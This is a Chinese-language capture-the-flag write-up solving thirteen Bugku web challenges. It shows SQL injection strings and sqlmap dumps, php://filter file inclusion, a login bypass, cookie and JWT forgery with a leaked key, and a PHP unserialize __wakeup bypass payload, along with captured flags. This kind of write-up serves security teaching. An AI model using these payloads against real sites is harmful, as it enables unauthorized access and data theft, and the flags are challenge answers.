文章首发于安恒网络空间安全讲武堂

平台地址:https://new.bugku.com/

web1 simple bypass

img

extract — 从数组中将变量导入到当前的符号表,trim — 去除字符串首尾处的空白字符(或者其他字符)。

Payload:a=&b=即可成功绕过,回显flag{c3fd1661da5efb989c72b91f3c378759}

web2 Quick calc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<html>
<head>
<title></title>
</head>
<body>
<p>
请在三秒之内计算出以下式子,计算正确就的到flag哦!<br/>
418*693117+32*(9976+2487)</p>
<form action="" method="post">
计算结果:<input type="text" name="result"/>
<input type="submit" value="提交"/>
</form>
</body>
</html>

Payload:

1
2
3
4
5
6
7
8
9
10
11
import re
import requests

url = 'http://123.206.31.85:10002/'
r = requests.session()
text = r.get(url).text
calc = str(re.findall("(.*?)</p>", text))[2:-2]
ans = eval(calc)
data = {'result':ans}
res = r.post(url, data)
print(res.text)

即可获得flag{b37d6bdd7bb132c7c7f6072cd318697c}

web3 php伪协议

img

尝试上传php文件时回显Sorry, only PNG files are allowed.

判断为服务端白名单验证,这里参考upload-labs题解思路进行测试。

img

测试无果,发现urlop参数首页为op=home上传页面为op=upload,猜测存在文件包含漏洞~

op=1回显:Error no such page

参考: php 伪协议

使用php伪协议尝试传参:?op=php://filter/read=convert.base64-encode/resource=flag,回显PD9waHAgCiRmbGFnPSJmbGFne2UwMGY4OTMxMDM3Y2JkYjI1ZjZiMWQ4MmRmZTU1NTJmfSI7IAo/Pgo=

Base64 decode:

1
2
3
<?php 
$flag="flag{e00f8931037cbdb25f6b1d82dfe5552f}";
?>

web4 万能密码

img

Payload: 万能密码, 注入点在password,password=' or '1'='1成功登陆。

flag{7ae7de60f14eb3cbd9403a0c4328598d}

web5 injection

hint: injection

img

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
> sqlmap -u "http://47.95.208.167:10005/?mod=read&id=1" -p "id" -v 3

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mod=read&id=2 AND 6548=6548
Vector: AND [INFERENCE]

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: mod=read&id=2 RLIKE SLEEP(5)
Vector: RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))


Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: mod=read&id=-1362 UNION ALL SELECT NULL,CONCAT(0x716b706b71,0x6b705a4550514d7864627845624c7252716d53456758474165446c66654e4a6b43714d776b767255,0x716b6a6b71),NULL,NULL-- vymr
Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]
---
[21:03:29] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12

...

> sqlmap -u "http://47.95.208.167:10005/?mod=read&id=1" -p "id" -v 3 -D "web5" -T "flag" -C "flag" --dump

Database: web5
Table: flag
[1 entry]
+----------------------------------------+
| flag |
+----------------------------------------+
| flag{320dbb1c03cdaaf29d16f9d653c88bcb} |
+----------------------------------------+

web6 XFF、F12

img

提交user=admin' or '1'='1pass=' or '1'='1后回显:IP禁止访问,请联系本地管理员登陆,IP已被记录.

猜想X-Forward-For: 127.0.0.1,这里通过Firefox插件X-Forwarded-For Header直接修改。

提交user=admin&pass=admin/user=amdin&pass=1后回显:Invalid credentials! Please try again!

F12查看源代码在5023行:<!-- dGVzdDEyMw== -->

base64.decode后得到密码test123

登陆后回显:The flag is: 85ff2ee4171396724bae20c0bd851f6b.

web7 吃个小饼干吗?

吃个小饼干吗?

img

注册测试用户后登陆,home.php页面如下:

img

任意内容提交回显相同页面。

想起小饼干的翻译是cookie,在报文中发现如下cookie字段:

1
2
3
4
5
6
7
Set-Cookie: u=351e76680321232f297a57a5a743894a0e4a801fc3
Set-Cookie: r=351e766803d63c7ede8cb1e1c8db5e51c63fd47cff
# 规律如下
Set-Cookie: u=351e766803 21232f297a57a5a743894a0e4a801fc3
Set-Cookie: r=351e766803 d63c7ede8cb1e1c8db5e51c63fd47cff
# md5(admin, 32) = 21232f297a57a5a743894a0e4a801fc3
# d63c7ede8cb1e1c8db5e51c63fd47cff 解密明文为 limited

尝试cookie欺骗~

img

web8 SimpleSQLI

img

注册测试账户后,个人信息更新页面如下:

img

dirsearch下发现有/.idea/workspace.xml泄露以及www.tar.gz源码文件。

img

update.php中age处存在数字型注入点,payload如下:

1
2
3
4
5
# 直接回显
(select group_concat(description) from (select description from users where username=0x61646d696e)x)
# 逐位爆破(注意csrf-token的处理)
0|conv(hex(substr((select description from (select * from users where username like 0x61646d696e)a),1,1)), 16, 10)
conv(hex(substr((select description from (select * from users where username regexp 0x61646d696e limit 0,1)a),1,1)), 16, 10)

img

web9 PUT me message!

put me a message bugku then you can get the flag

img

Base64.decode->flag{T7l8xs9fc1nct8NviPTbn3fG0dzX9V}.

web10 在线日记本

hint:JWT你需要了解一哈.

img

img

base32.decode(“NNVTU23LGEZDG===”)=kk:kk123,username=kk&password=kk123提交登录。

img

img

下载L3yx.php.swp文件,通过vi -r L3yx.php:wq还原文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>在线日记本</title>
<form action="" method="POST">
<p>username: <input type="text" name="username" /></p>
<p>password: <input type="password" name="password" /></p>
<input type="submit" value="login" />
</form>
<!--hint:NNVTU23LGEZDG===-->
</html>

<?php
error_reporting(0);
require_once 'src/JWT.php';

const KEY = 'L3yx----++++----';

function loginkk()
{
$time = time();
$token = [
'iss'=>'L3yx',
'iat'=>$time,
'exp'=>$time+5,
'account'=>'kk'
];
$jwt = \Firebase\JWT\JWT::encode($token,KEY);
setcookie("token",$jwt);
header("location:user.php");
}

if(isset($_POST['username']) && isset($_POST['password']) && $_POST['username']!='' && $_POST['password']!='')
{
if($_POST['username']=='kk' && $_POST['password']=='kk123')
{
loginkk();
}
else
{
echo "账号或密码错误";
}
}
?>

JWT学习参考:JSON Web Token 入门教程 - 阮一峰

获取Key='L3yx----++++----',使用kk账户登录得到:

1
2
3
4
5
6
7
8
# Header.Payload.Signature
token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJMM3l4IiwiaWF0IjoxNTUxOTY1ODIxLCJleHAiOjE1NTE5NjU4MjYsImFjY291bnQiOiJrayJ9.ImnDWj4kYTxYyGfrOt-M0LCSwYSC8VtjdTfP03MLOyg
# Header
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.
# Payload
eyJpc3MiOiJMM3l4IiwiaWF0IjoxNTUxOTY1ODIxLCJleHAiOjE1NTE5NjU4MjYsImFjY291bnQiOiJrayJ9.
# Signature
ImnDWj4kYTxYyGfrOt-M0LCSwYSC8VtjdTfP03MLOyg

img

更改account为L3yx,提前计算好iat和exp构造Token发包到user.php~

img

img

web11 MD5截断比较

1
2
3
4
5
6
<html>
<title>robots</title>
<body>
We han't anything!
</body>
</html>

访问.robots发现:Disallow: /shell.php,打开/shell.php.

img

可知为md5截断比较~ 每次刷新页面匹配值会改变,这里采用短时间生成大量MD5,牺牲空间来换取时间~

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# -*- coding: utf-8 -*-
import hashlib
sum = []
j = 0
f = open("gen_md5.txt", "a")
for i in xrange(1000000000):
tmp = (hashlib.md5(str(i)).hexdigest(),i)
sum.append(tmp)
j = j+1
if(j==10000000):
for i in sum:
f.write("{0} {1}".format(i,"\n"))
j=0
sum = []
f.close()

执行命令正则匹配:cat gen_md5.txt | grep \(\'str检索符合的MD5~

img

得到:flag{e2f86fb5f75da4999e6f4957d89aaca0}.

web12 unserialize

hint:时间好长啊

img

F12检查源代码发现注释掉的PHP代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
class Time{
public $flag = ******************;
public $truepassword = ******************;
public $time;
public $password ;
public function __construct($tt, $pp) {
$this->time = $tt;
$this->password = $pp;
}
function __destruct(){
if(!empty($this->password))
{
if(strcmp($this->password,$this->truepassword)==0){
echo "<h1>Welcome,you need to wait......<br>The flag will become soon....</h1><br>";
if(!empty($this->time)){
if(!is_numeric($this->time)){
echo 'Sorry.<br>';
show_source(__FILE__);
}
else if($this->time < 11 * 22 * 33 * 44 * 55 * 66){
echo 'you need a bigger time.<br>';
}
else if($this->time > 66 * 55 * 44 * 33 * 23 * 11){
echo 'you need a smaller time.<br>';
}
else{
sleep((int)$this->time);
var_dump($this->flag);
}
echo '<hr>';
}
else{
echo '<h1>you have no time!!!!!</h1><br>';
}
}
else{
echo '<h1>Password is wrong............</h1><br>';
}
}
else{
echo "<h1>Please input password..........</h1><br>";
}
}
function __wakeup(){
$this->password = 1; echo 'hello hacker,I have changed your password and time, rua!';
}
}
if(isset($_GET['rua'])){
$rua = $_GET['rua'];
@unserialize($rua);
}
else{
echo "<h1>Please don't stop rua 233333</h1><br>";
}

典型的PHP反序列化题目,可以参考:PHP反序列化由浅入深学习了解~

简单审计思路:通过GET传值rua后进行反序列化, unserialize() 会检查是否存在一个 wakeup() 方法。如果存在,则会先调用 __wakeup 方法,预先准备对象需要的资源。destruct()会在对象的所有引用都被删除或者当对象被显式销毁时执行,想要获取flag,我们需要rua满足一下条件:

  • strcmp($this->password,$this->truepassword)==0
  • $this->time < 11 * 22 * 33 * 44 * 55 * 66 & $this->time > 66 * 55 * 44 * 33 * 23 * 11
  • sleep((int)$this->time)

绕过方法:

  • 绕过wakeup的执行(CVE-2016-7124):**当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过wakeup的执行**,修改对象属性个数。
  • 绕过strcmp: Php5.3之后版本使用strcmp比较一个字符串和数组的话,将不再返回-1而是返回0,构造password数组。
  • 绕过sleep(): (1)使用16进制表示0x开头,强制类型转化时会转化为0;(2)使用科学计数法绕过,1.3E9

img

构造脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
class Time{
public $time;
public $password;
public function __construct($tt, $pp) {
$this->time = $tt;
$this->password = $pp;
}
}
$array = array(
0 => "bar",
1 => "foo",
);
$time = '0x4d7c6d00';
$rua = new Time($time, $array);
echo serialize($rua);
//O:4:"Time":2:{s:4:"time";s:10:"0x4d7c6d00";s:8:"password";a:2:{i:0;s:3:"bar";i:1;s:3:"foo";}}
?>

Payload:rua=O:4:"Time":3:{s:4:"time";s:10:"0x4d7c6d00";s:8:"password";a:2:{i:0;s:3:"bar";i:1;s:3:"foo";}}.

img

web13 to be faster

img

用BurpSuite抓包分析如下:

img

在response Header头里发现了PasswordHint字段,base64解密Password后得到flag{f4970aacbacfba9e57ddbf998fa2e29d},提交错误~

Hint: Seeing is not believing, maybe you need to be faster!

尝试将Password解密后flag{}里面包含的字段提交回显如下:

img

推测需要先发送一个请求截取Password字段,然后base解密取flag{}内包含的值作为password的值发包,速度要快。

Payload:

1
2
3
4
5
6
7
8
9
import requests
import base64
url = 'http://123.xxx.xxx.85:10013/index.php'
r = requests.session()
r1 = r.post(url, data = {'password':'flag'})
Password = r1.headers['Password']
password = str(base64.b64decode(Password), 'utf-8')[5:-1]
r2 = r.post(url, data = {'password':password})
print(r2.text)

img